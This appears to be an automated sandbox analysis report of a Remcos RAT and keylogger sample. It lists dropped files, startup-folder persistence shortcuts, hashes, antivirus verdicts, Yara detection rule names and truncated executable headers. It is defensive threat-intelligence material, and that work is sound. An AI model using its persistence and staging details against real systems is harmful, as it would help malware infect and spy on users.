File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	modified
Size (bytes):	500224
Entropy (8bit):	6.590620352205087
Encrypted:	false
SSDEEP:	6144:bTz+c6KHYBhDc1RGJdv//NkUn+N5Bkf/0TELRvIZPjbsAOZZ7AXpcrlT4h:bTlrYw1RUh3NFn+N5WfIQIjbs/Z79T4h
MD5:	6CA401F82443B673FCA7D7DDB0A05357
SHA1:	82E54CBDCF4E12A72A32E52E0FD03C095485B841
SHA-256:	7AA4BC94F891709D5B0FF9C2F95060AEEFB5AC6EB75222F9F105E29C3965629F
SHA-512:	A4FE6F7E935DC83D6F6C7CA5CF62AE97B2B2FFEC1E2E075CB436CEEECC2DBB27F515A8A0F6360176FE7AE4E273C413F1E922666A016C070B399DB253AA77614C
Malicious:	true
Yara Hits:	Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: C:\Users\user\AppData\Local\Temp\lejp, Author: Joe Security Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: C:\Users\user\AppData\Local\Temp\lejp, Author: Joe Security Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: C:\Users\user\AppData\Local\Temp\lejp, Author: Joe Security Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: C:\Users\user\AppData\Local\Temp\lejp, Author: unknown Rule: REMCOS_RAT_variants, Description: unknown, Source: C:\Users\user\AppData\Local\Temp\lejp, Author: unknown Rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM, Description: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003), Source: C:\Users\user\AppData\Local\Temp\lejp, Author: ditekSHen
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 87%
Joe Sandbox View:	Filename: epht1Y3TGZ.exe, Detection: malicious, Browse Filename: 55Ka50lb6Z.bat, Detection: malicious, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........{.-H..~H..~H..~..'~[..~..%~...~..$~V..~AbR~I..~..~J..~.D..R..~.D..r..~.D..j..~AbE~Q..~H..~v..~.D..,..~.D)~I..~.D..I..~RichH..~........................PE..L...s:.Z.................r...........J............@..........................@...........................................................H.......................;..P...8...............................@............................................text....q.......r.................. ..`.rdata...y.......z...v..............@..@.data...D]..........................@....tls.........p......................@....gfids..0...........................@..@.rsrc....H.......J..................@..@.reloc...;.......<...N..............@..Bcmxvoc... ... ......................@...........................................................................................................................................................

C:\Users\user\AppData\Local\Temp\paogviura

Download File

Process:	C:\Windows\SysWOW64\cmd.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	modified
Size (bytes):	500224
Entropy (8bit):	6.590620352205087
Encrypted:	false
SSDEEP:	6144:bTz+c6KHYBhDc1RGJdv//NkUn+N5Bkf/0TELRvIZPjbsAOZZ7AXpcrlT4h:bTlrYw1RUh3NFn+N5WfIQIjbs/Z79T4h
MD5:	6CA401F82443B673FCA7D7DDB0A05357
SHA1:	82E54CBDCF4E12A72A32E52E0FD03C095485B841
SHA-256:	7AA4BC94F891709D5B0FF9C2F95060AEEFB5AC6EB75222F9F105E29C3965629F
SHA-512:	A4FE6F7E935DC83D6F6C7CA5CF62AE97B2B2FFEC1E2E075CB436CEEECC2DBB27F515A8A0F6360176FE7AE4E273C413F1E922666A016C070B399DB253AA77614C
Malicious:	true
Yara Hits:	Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: C:\Users\user\AppData\Local\Temp\paogviura, Author: Joe Security Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: C:\Users\user\AppData\Local\Temp\paogviura, Author: Joe Security Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: C:\Users\user\AppData\Local\Temp\paogviura, Author: Joe Security Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: C:\Users\user\AppData\Local\Temp\paogviura, Author: unknown Rule: REMCOS_RAT_variants, Description: unknown, Source: C:\Users\user\AppData\Local\Temp\paogviura, Author: unknown Rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM, Description: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003), Source: C:\Users\user\AppData\Local\Temp\paogviura, Author: ditekSHen
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 87%
Joe Sandbox View:	Filename: epht1Y3TGZ.exe, Detection: malicious, Browse Filename: 55Ka50lb6Z.bat, Detection: malicious, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........{.-H..~H..~H..~..'~[..~..%~...~..$~V..~AbR~I..~..~J..~.D..R..~.D..r..~.D..j..~AbE~Q..~H..~v..~.D..,..~.D)~I..~.D..I..~RichH..~........................PE..L...s:.Z.................r...........J............@..........................@...........................................................H.......................;..P...8...............................@............................................text....q.......r.................. ..`.rdata...y.......z...v..............@..@.data...D]..........................@....tls.........p......................@....gfids..0...........................@..@.rsrc....H.......J..................@..@.reloc...;.......<...N..............@..Bcmxvoc... ... ......................@...........................................................................................................................................................

C:\Users\user\AppData\Local\Temp\rjhlrgwt

Download File

Process:	C:\Windows\SysWOW64\cmd.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	modified
Size (bytes):	500224
Entropy (8bit):	6.590620352205087
Encrypted:	false
SSDEEP:	6144:bTz+c6KHYBhDc1RGJdv//NkUn+N5Bkf/0TELRvIZPjbsAOZZ7AXpcrlT4h:bTlrYw1RUh3NFn+N5WfIQIjbs/Z79T4h
MD5:	6CA401F82443B673FCA7D7DDB0A05357
SHA1:	82E54CBDCF4E12A72A32E52E0FD03C095485B841
SHA-256:	7AA4BC94F891709D5B0FF9C2F95060AEEFB5AC6EB75222F9F105E29C3965629F
SHA-512:	A4FE6F7E935DC83D6F6C7CA5CF62AE97B2B2FFEC1E2E075CB436CEEECC2DBB27F515A8A0F6360176FE7AE4E273C413F1E922666A016C070B399DB253AA77614C
Malicious:	true
Yara Hits:	Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: C:\Users\user\AppData\Local\Temp\rjhlrgwt, Author: Joe Security Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: C:\Users\user\AppData\Local\Temp\rjhlrgwt, Author: Joe Security Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: C:\Users\user\AppData\Local\Temp\rjhlrgwt, Author: Joe Security Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: C:\Users\user\AppData\Local\Temp\rjhlrgwt, Author: unknown Rule: REMCOS_RAT_variants, Description: unknown, Source: C:\Users\user\AppData\Local\Temp\rjhlrgwt, Author: unknown Rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM, Description: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003), Source: C:\Users\user\AppData\Local\Temp\rjhlrgwt, Author: ditekSHen
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 87%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........{.-H..~H..~H..~..'~[..~..%~...~..$~V..~AbR~I..~..~J..~.D..R..~.D..r..~.D..j..~AbE~Q..~H..~v..~.D..,..~.D)~I..~.D..I..~RichH..~........................PE..L...s:.Z.................r...........J............@..........................@...........................................................H.......................;..P...8...............................@............................................text....q.......r.................. ..`.rdata...y.......z...v..............@..@.data...D]..........................@....tls.........p......................@....gfids..0...........................@..@.rsrc....H.......J..................@..@.reloc...;.......<...N..............@..Bcmxvoc... ... ......................@...........................................................................................................................................................

C:\Users\user\AppData\Local\Temp\wanynpfhxudgrp

Download File

Process:	C:\Windows\SysWOW64\cmd.exe
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Wed Sep 25 15:34:02 2024, mtime=Wed Sep 25 15:34:02 2024, atime=Wed Sep 25 10:50:28 2024, length=8767704, window=hide
Category:	dropped
Size (bytes):	939
Entropy (8bit):	5.086548511212798
Encrypted:	false
SSDEEP:	24:8AZeR2Yt6JqB2c9drpE8x3hALprourEJgJtm:8AZe5t6JG2cTra8w9tAJgJt
MD5:	F2F09DD8BC63832A6A2249186765CED6
SHA1:	4FD9FB6B14EEE26EEEA5E53A0467F4D64AB791BB
SHA-256:	57D07B671930537C3A5E935EBD8606645C02C801C39CBA249B62E1EC14B084B0
SHA-512:	97DD08802BD5C5D419163F97123D885166354E17AA34B921CC3B11469E9B33BC5C2E8F6B9BAF55202ABDBDE7DA32267A5B16C3DE6472F3261230A9D8B45B716A
Malicious:	false
Preview:	L..................F.... ...ey.h....;..h.......A............................:..DG..Yr?.D..U..k0.&...&......Qg._...6...h...u..Xv.......t...CFSF..1.....EW.=..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......EW.=9Y7...........................3N.A.p.p.D.a.t.a...B.V.1.....9YB...Roaming.@......EW.=9YB...........................:...R.o.a.m.i.n.g.....b.1.....9YB...RUY_DR~1..J......9YB.9YB.....8.....................>...R.u.y._.d.r.i.v.e.r.v.2.....\.2....9YO^ .DZIPR.exe.D......9YB.9YB...........................d...D.Z.I.P.R...e.x.e.......h...............-.......g.............l.....C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe..<.....\.....\.....\.....\.f.r.o.n.t.d.e.s.k.\.A.p.p.D.a.t.a.\.R.o.a.m.i.n.g.\.R.u.y._.d.r.i.v.e.r.v.2.\.D.Z.I.P.R...e.x.e.`.......X.......632922...........hT..CrF.f4... ..../Tc...,......hT..CrF.f4... ..../Tc...,......E.......9...1SPS..mD..pH.H@..=x.....h....H.....K...YM...?................

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\BITE1BA.tmp

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Wed Sep 25 15:34:02 2024, mtime=Wed Sep 25 15:34:02 2024, atime=Wed Sep 25 10:50:28 2024, length=8767704, window=hide
Category:	dropped
Size (bytes):	939
Entropy (8bit):	5.086548511212798
Encrypted:	false
SSDEEP:	24:8AZeR2Yt6JqB2c9drpE8x3hALprourEJgJtm:8AZe5t6JG2cTra8w9tAJgJt
MD5:	F2F09DD8BC63832A6A2249186765CED6
SHA1:	4FD9FB6B14EEE26EEEA5E53A0467F4D64AB791BB
SHA-256:	57D07B671930537C3A5E935EBD8606645C02C801C39CBA249B62E1EC14B084B0
SHA-512:	97DD08802BD5C5D419163F97123D885166354E17AA34B921CC3B11469E9B33BC5C2E8F6B9BAF55202ABDBDE7DA32267A5B16C3DE6472F3261230A9D8B45B716A
Malicious:	false
Preview:	L..................F.... ...ey.h....;..h.......A............................:..DG..Yr?.D..U..k0.&...&......Qg._...6...h...u..Xv.......t...CFSF..1.....EW.=..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......EW.=9Y7...........................3N.A.p.p.D.a.t.a...B.V.1.....9YB...Roaming.@......EW.=9YB...........................:...R.o.a.m.i.n.g.....b.1.....9YB...RUY_DR~1..J......9YB.9YB.....8.....................>...R.u.y._.d.r.i.v.e.r.v.2.....\.2....9YO^ .DZIPR.exe.D......9YB.9YB...........................d...D.Z.I.P.R...e.x.e.......h...............-.......g.............l.....C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe..<.....\.....\.....\.....\.f.r.o.n.t.d.e.s.k.\.A.p.p.D.a.t.a.\.R.o.a.m.i.n.g.\.R.u.y._.d.r.i.v.e.r.v.2.\.D.Z.I.P.R...e.x.e.`.......X.......632922...........hT..CrF.f4... ..../Tc...,......hT..CrF.f4... ..../Tc...,......E.......9...1SPS..mD..pH.H@..=x.....h....H.....K...YM...?................

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\oracledemo_dbg.lnk (copy)

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Wed Sep 25 15:34:02 2024, mtime=Wed Sep 25 15:34:02 2024, atime=Wed Sep 25 10:50:28 2024, length=8767704, window=hide
Category:	dropped
Size (bytes):	939
Entropy (8bit):	5.086548511212798
Encrypted:	false
SSDEEP:	24:8AZeR2Yt6JqB2c9drpE8x3hALprourEJgJtm:8AZe5t6JG2cTra8w9tAJgJt
MD5:	F2F09DD8BC63832A6A2249186765CED6
SHA1:	4FD9FB6B14EEE26EEEA5E53A0467F4D64AB791BB
SHA-256:	57D07B671930537C3A5E935EBD8606645C02C801C39CBA249B62E1EC14B084B0
SHA-512:	97DD08802BD5C5D419163F97123D885166354E17AA34B921CC3B11469E9B33BC5C2E8F6B9BAF55202ABDBDE7DA32267A5B16C3DE6472F3261230A9D8B45B716A
Malicious:	false
Preview:	L..................F.... ...ey.h....;..h.......A............................:..DG..Yr?.D..U..k0.&...&......Qg._...6...h...u..Xv.......t...CFSF..1.....EW.=..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......EW.=9Y7...........................3N.A.p.p.D.a.t.a...B.V.1.....9YB...Roaming.@......EW.=9YB...........................:...R.o.a.m.i.n.g.....b.1.....9YB...RUY_DR~1..J......9YB.9YB.....8.....................>...R.u.y._.d.r.i.v.e.r.v.2.....\.2....9YO^ .DZIPR.exe.D......9YB.9YB...........................d...D.Z.I.P.R...e.x.e.......h...............-.......g.............l.....C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe..<.....\.....\.....\.....\.f.r.o.n.t.d.e.s.k.\.A.p.p.D.a.t.a.\.R.o.a.m.i.n.g.\.R.u.y._.d.r.i.v.e.r.v.2.\.D.Z.I.P.R...e.x.e.`.......X.......632922...........hT..CrF.f4... ..../Tc...,......hT..CrF.f4... ..../Tc...,......E.......9...1SPS..mD..pH.H@..=x.....h....H.....K...YM...?................

C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.dll

Download File

Process:	C:\Users\user\DZIPR.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	354304
Entropy (8bit):	6.005348176071358
Encrypted:	false
SSDEEP:	6144:GBy1KULDZ+B55Lj5mCcBKyWm4IVFWyTBBa:x255L1mCcBKyWDsy
MD5:	AD28D4167571382569D2384FFD7BD2A9
SHA1:	EFC7534BCB1645D4056702E073519F571D8DB77B
SHA-256:	F919A8E63EC0F2F05AC01A6CAB4088C13FBF14A38B071CFA9F710C9E069462EB
SHA-512:	8F28867B46DD7A801CBF70D8D7FE5F2BFB8654A417C40BA264FAF81AF8BB1A28E1A1200FDC9828A4A4C6DF0A13817055290C16F9468D311B8D8049A2439348D9
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......<..~x..-x..-x..-_4.-...-_4.-m..-x..-...-q.X-a..-q.N-...-q.I-...-f.I-{..-q.G-v..-q._-y..-f.Y-y..-q.\-y..-Richx..-........PE..L......e...........!.....f...........I....................................................@.............................O... ................................p...&.................................. ...@...............(.......@....................text....e.......f.................. ..`.rdata..............j..............@..@.data...t~.......$..................@....rsrc...............................@..@.reloc..Rq...p...r..................@..B................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe

Download File

Process:	C:\Users\user\DZIPR.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	8767704
Entropy (8bit):	7.112848215947183
Encrypted:	false
SSDEEP:	196608:zoR6Nv4zX/hW/7vpqCv3wrwxd8Sr3a8i5ynKVrzzky9WD9rrBrIrrsSrCrbrCrr+:6SAzXQjkCv3wrwxd8Sr3a8i5ynKVrzzq
MD5:	EC9CE1D67F98072281015C7726FBA245
SHA1:	E89B16265ACF4A251B527DDF22830F2650987263
SHA-256:	9AB4145D5525AE741B80F4E66F505ABBA59ADCBE01868DFEF84FBE4450634CC1
SHA-512:	21DB8F3AE325021589DE9C2489AB2CE6814722A17A92476A56147478AA9767CE5C4769169F287060CC08AD76019178BA547FCEF32074EF1AFB1926845E7158E1
Malicious:	true
Yara Hits:	Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe, Author: Joe Security
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L.../..e..................J...;.......J...... J...@.............................................@............................L..F....R...3..............(....M.@.............................L.....................,.L.......L......................text.....I.......I................. ..`.itext..l+....I..,....I............. ..`.data........ J.......J.............@....bss..........K.......K..................idata...F....L..H....K.............@....didata.......L.......L.............@....tls....@.....L...... L..................rdata........L...... L.............@..@.reloc..@.....M......"L.............@..B.rsrc.....3...R...3...Q.............@..@....................................@..@........................................................

C:\Users\user\AppData\Roaming\Ruy_driverv2\ekqqtq

Download File

Process:	C:\Users\user\DZIPR.exe
File Type:	data
Category:	dropped
Size (bytes):	975374
Entropy (8bit):	7.888212877886324
Encrypted:	false
SSDEEP:	24576:uLAGNVG5bTGfhtqkZEgJUyAre0DnrDJLJ1IC:KTp/qkqIArtHJd1IC
MD5:	4649F3A4E58C6040B07F6D486C149A71
SHA1:	64F8FC631C5FB4E5F6BC20C207047D8E2B500587
SHA-256:	5D81CA77492946AA2CFE00349342DE8CCEB317D8649BEDBFD95992DCA885F184
SHA-512:	4E1B229D30403B594E992FE0893E568161C8D901FE20461093D11159AB03B5DD410D1834BC64AC4CCC39D4F6B072946703F06EEB982D79B1C9A1B773B57013B7
Malicious:	false
Preview:	...\.L..s..J....evCX.u..qPZdT.U.pkvFSh.kJ......gu.....u...P.^O....Eg]j.t^x.JEw..U.E`^.xh.B...r........Iw.....BK..h..Pa..c.apT.F...si...Ww.Z..u.ydFAq`.TJ.G....vY`u.b....i.Z.Z.Kx..q.UP.OR.m..e.....yF..b..R.r...]s...t......g.Q..j.ekUYeV._.^F.a..B_b..d..[.Tcy....q...Y.K.Hc..W....\cdo..[jrL.vfXR_SQ.g...[....efMX..cjVl.....x.fX.NR...^..ysky..t.iD.J..TE.........w.q....f..hA..m...._.Z.k.A....Z.QCF^.UL.X..j.....`PJ..m......dlUkvE.P...jNo.W.c..Mp.v.d.G..PTkSW....iMXN.k.].....JIm..._.[.Wpb.a....C...oY...hB..ut..U.c..Ig]G.`..n....XV.qe.D...RxKT....^.wF]On.m....t.....TlESv.^Af.......M.K\....R.O.xLq.wCX.....NxHK...f...w.t.i........s.....W.x.\....[.p....bY...n....BO...W..Kc..bbO..q...`.c..Zay.i.EnZ..p...MIDQAbIt..N.yy..C...st.a.eZL...L..VYLoo.ZdAy[....ji.IpcvtNd........^g..e.Ekk..t...w.h.KtPgKl...[.J._D._.nr.ZF..Nuj...OnQ..HgG..I..xFK...Q`.A.....M....tt...Ja.K..L.j...s......ir...FT....e.Q.W...v.I.Nb.c.oGnNVCV.ojf.x...UoW.X.y...g.o.HrdM.Cga..WyJ..u.xd.AEcf.I..._._t..t.n.np..`W.GC....i..JJ...[`SVUqh...

C:\Users\user\AppData\Roaming\Ruy_driverv2\ipqtwm

Download File

Process:	C:\Users\user\DZIPR.exe
File Type:	data
Category:	dropped
Size (bytes):	72329
Entropy (8bit):	4.4816230098296295
Encrypted:	false
SSDEEP:	1536:wwBU0cfQiZJyld+smk3i92UcmUTY4bBc/UVoVJnaDa:wAU0niZJMtXi9yx84Fc/UaJnaDa
MD5:	F125E72B3968CA233EF3C7E2F4DB34E7
SHA1:	4FB34044EF18CEDBD3EDE4272C44416D3F11735C
SHA-256:	CED30560C6C0FC15CBDBDBC0D480DCA6B41CE3183057E43B419DD6814A33DB92
SHA-512:	B645D1EB685A69B9CA9BBDB1F4638AF8AE151DDFB9527C423F7779971246ED60F981CE26CE8AF2FC7B63164E7C13E9C6E98A7F148831A1E59318E60E5A39F881
Malicious:	false
Preview:	]dQ.cK.HM.oxC.bO].mQB...L.hHK....W..baW...f`kn.F.Iq.InDbX.M.J.W.CQF.]..M.....G.......J.GN......r.xZE.w.LP...h.[gx.cGq..ej..iQ.I...Q..V.....A.N..kX...ru..w.ZsOSBK..O...F..D...\Mh.q......`MjE.v...W.i.edA....UZ.x.Pf...Y.S.X...DQSG..y..GF..SD...y.pHM...mIE...].rY.jmZ.wA...eNnuh...jk.N.TI.s..W..M...xrSwCYKVq..Uf[r..Mm.uR......U.]..M.VobY...V.A.H_r....b\a..x.r.aj.P..r.O..ik.....]Lf.Ei..S..D...d.........qR..Aw.Q.QH..b...p.Of..v.p..]..t...g.lg.HD.g...O..K.CKj._...vI..Wu.sPu..PDPZ.\vvw.b...sQ.M.^.B..X...r.f.....ja..j..k.p.\J.UVg...S_Zq.c....I..hN[f..A.F_..WY.]Qr...YL.co.Y......I.......O...jG.Q.x]pp_.u^Vr..iiI..L_..SyWf`nr.b.`..e.Hm...B....y...Y.....d....qFUg.Ma..uPB_\.\..f..i..jE.v.....uxRV..[aM.l.Y..NT...vbef...bBcsRs.jW...pH.`B.FVL^.......y.....Z.....W...._eu..W.P...FYX.d..CE..dxg.....F.b^...MfysH...q.k..^..l....M...wqX.M`...B[..WN.]..M.......A.U.ZX[.n]........xTup...^y.nUgpcx..iu.`.Rv].i\b..UIwA..M..TQ.T.F...jA..p..VI.m.R..Va...V.P.H..y..vhjr....l..oZ.....[y.b.O.FA.c.DEQ]..n.ZU.Dt[Z.O.T.]...

C:\Users\user\AppData\Roaming\hello.exe

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	4809996
Entropy (8bit):	7.988259707956486
Encrypted:	false
SSDEEP:	98304:+pbYDHaUeRG/GnYDievJRVrQo4QGB0s53+sTH7/93veWGLRHHk:+pbu9e+qYDiQf1hfGWsBVb/rGLhE
MD5:	25860926414BF43383246F7C773A8D6C
SHA1:	760390A4A14DF085F4C841067F52C79409CDC93E
SHA-256:	A8E552944846A2F5E8FEFEA4A250046DA29D74D1F58F7A868258E6DED9597958
SHA-512:	61825EF1B03F5516F2820FAAE3DAD01911054DEBB714B2162FD28CDC7C26199EB6174EDDB3E48A4B200C350A083A561A58BD2724496FCB71E87D4492E2EC5A07
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 3%
Preview:	MZ`.....................@...................................`...........!..L.!Require Windows..$PE..L...~.&L.....................................0....@..........................0.......3.......................................P.......................................................................................0...............................text............................... ..`.rdata...0...0...2..................@..@.data...,)...p.......H..............@....rsrc................P..............@..@........U.......SVWj'.....u..v..=`2A..6P......P..e......~..v8.^..3......h.3A.P..........P......P..p1A..E..E....;F.r......P.,f..Y.-..j...t1A...t$..l....3.9..wA.t...@....9D$.t..t$.Ph.....5.wA....2A.3.....D$..`...\|$..u..@.....3.....D$...V...t...P.Q...^....T$.V.t$......f..BBFFf..u.^.L$.3.f9.t.@f.<A.u..S.\$.V..C;^.tLW3.j.Z...........Q......3.9F.Y~.9F.~...f..Af..G@;F.\|..6....Y.F..>f.$G..^._^[...U..QQ..lwA..uVj.j..E.P.5.wA...l1A...t>.E.;E.w6r..E.;E.s,j*.....P.He.....YYt...(wA.j.....@... .

C:\Users\user\DZIPR.dll

Download File

Process:	C:\Users\user\AppData\Roaming\hello.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	354304
Entropy (8bit):	6.005348176071358
Encrypted:	false
SSDEEP:	6144:GBy1KULDZ+B55Lj5mCcBKyWm4IVFWyTBBa:x255L1mCcBKyWDsy
MD5:	AD28D4167571382569D2384FFD7BD2A9
SHA1:	EFC7534BCB1645D4056702E073519F571D8DB77B
SHA-256:	F919A8E63EC0F2F05AC01A6CAB4088C13FBF14A38B071CFA9F710C9E069462EB
SHA-512:	8F28867B46DD7A801CBF70D8D7FE5F2BFB8654A417C40BA264FAF81AF8BB1A28E1A1200FDC9828A4A4C6DF0A13817055290C16F9468D311B8D8049A2439348D9
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......<..~x..-x..-x..-_4.-...-_4.-m..-x..-...-q.X-a..-q.N-...-q.I-...-f.I-{..-q.G-v..-q._-y..-f.Y-y..-q.\-y..-Richx..-........PE..L......e...........!.....f...........I....................................................@.............................O... ................................p...&.................................. ...@...............(.......@....................text....e.......f.................. ..`.rdata..............j..............@..@.data...t~.......$..................@....rsrc...............................@..@.reloc..Rq...p...r..................@..B................................................................................................................................................................................................................................................................................................................

C:\Users\user\DZIPR.exe

Download File

Process:	C:\Users\user\AppData\Roaming\hello.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	8767704
Entropy (8bit):	7.112848215947183
Encrypted:	false
SSDEEP:	196608:zoR6Nv4zX/hW/7vpqCv3wrwxd8Sr3a8i5ynKVrzzky9WD9rrBrIrrsSrCrbrCrr+:6SAzXQjkCv3wrwxd8Sr3a8i5ynKVrzzq
MD5:	EC9CE1D67F98072281015C7726FBA245
SHA1:	E89B16265ACF4A251B527DDF22830F2650987263
SHA-256:	9AB4145D5525AE741B80F4E66F505ABBA59ADCBE01868DFEF84FBE4450634CC1
SHA-512:	21DB8F3AE325021589DE9C2489AB2CE6814722A17A92476A56147478AA9767CE5C4769169F287060CC08AD76019178BA547FCEF32074EF1AFB1926845E7158E1
Malicious:	true
Yara Hits:	Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: C:\Users\user\DZIPR.exe, Author: Joe Security
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L.../..e..................J...;.......J...... J...@.............................................@............................L..F....R...3..............(....M.@.............................L.....................,.L.......L......................text.....I.......I................. ..`.itext..l+....I..,....I............. ..`.data........ J.......J.............@....bss..........K.......K..................idata...F....L..H....K.............@....didata.......L.......L.............@....tls....@.....L...... L..................rdata........L...... L.............@..@.reloc..@.....M......"L.............@..B.rsrc.....3...R...3...Q.............@..@....................................@..@........................................................

C:\Users\user\ekqqtq

Download File

Process:	C:\Users\user\AppData\Roaming\hello.exe
File Type:	data
Category:	dropped
Size (bytes):	975374
Entropy (8bit):	7.888212877886324
Encrypted:	false
SSDEEP:	24576:uLAGNVG5bTGfhtqkZEgJUyAre0DnrDJLJ1IC:KTp/qkqIArtHJd1IC
MD5:	4649F3A4E58C6040B07F6D486C149A71
SHA1:	64F8FC631C5FB4E5F6BC20C207047D8E2B500587
SHA-256:	5D81CA77492946AA2CFE00349342DE8CCEB317D8649BEDBFD95992DCA885F184
SHA-512:	4E1B229D30403B594E992FE0893E568161C8D901FE20461093D11159AB03B5DD410D1834BC64AC4CCC39D4F6B072946703F06EEB982D79B1C9A1B773B57013B7
Malicious:	false
Preview:	...\.L..s..J....evCX.u..qPZdT.U.pkvFSh.kJ......gu.....u...P.^O....Eg]j.t^x.JEw..U.E`^.xh.B...r........Iw.....BK..h..Pa..c.apT.F...si...Ww.Z..u.ydFAq`.TJ.G....vY`u.b....i.Z.Z.Kx..q.UP.OR.m..e.....yF..b..R.r...]s...t......g.Q..j.ekUYeV._.^F.a..B_b..d..[.Tcy....q...Y.K.Hc..W....\cdo..[jrL.vfXR_SQ.g...[....efMX..cjVl.....x.fX.NR...^..ysky..t.iD.J..TE.........w.q....f..hA..m...._.Z.k.A....Z.QCF^.UL.X..j.....`PJ..m......dlUkvE.P...jNo.W.c..Mp.v.d.G..PTkSW....iMXN.k.].....JIm..._.[.Wpb.a....C...oY...hB..ut..U.c..Ig]G.`..n....XV.qe.D...RxKT....^.wF]On.m....t.....TlESv.^Af.......M.K\....R.O.xLq.wCX.....NxHK...f...w.t.i........s.....W.x.\....[.p....bY...n....BO...W..Kc..bbO..q...`.c..Zay.i.EnZ..p...MIDQAbIt..N.yy..C...st.a.eZL...L..VYLoo.ZdAy[....ji.IpcvtNd........^g..e.Ekk..t...w.h.KtPgKl...[.J._D._.nr.ZF..Nuj...OnQ..HgG..I..xFK...Q`.A.....M....tt...Ja.K..L.j...s......ir...FT....e.Q.W...v.I.Nb.c.oGnNVCV.ojf.x...UoW.X.y...g.o.HrdM.Cga..WyJ..u.xd.AEcf.I..._._t..t.n.np..`W.GC....i..JJ...[`SVUqh...

C:\Users\user\ipqtwm

Download File

Process:	C:\Users\user\AppData\Roaming\hello.exe
File Type:	data
Category:	dropped
Size (bytes):	72329
Entropy (8bit):	4.4816230098296295
Encrypted:	false
SSDEEP:	1536:wwBU0cfQiZJyld+smk3i92UcmUTY4bBc/UVoVJnaDa:wAU0niZJMtXi9yx84Fc/UaJnaDa
MD5:	F125E72B3968CA233EF3C7E2F4DB34E7
SHA1:	4FB34044EF18CEDBD3EDE4272C44416D3F11735C
SHA-256:	CED30560C6C0FC15CBDBDBC0D480DCA6B41CE3183057E43B419DD6814A33DB92
SHA-512:	B645D1EB685A69B9CA9BBDB1F4638AF8AE151DDFB9527C423F7779971246ED60F981CE26CE8AF2FC7B63164E7C13E9C6E98A7F148831A1E59318E60E5A39F881
Malicious:	false
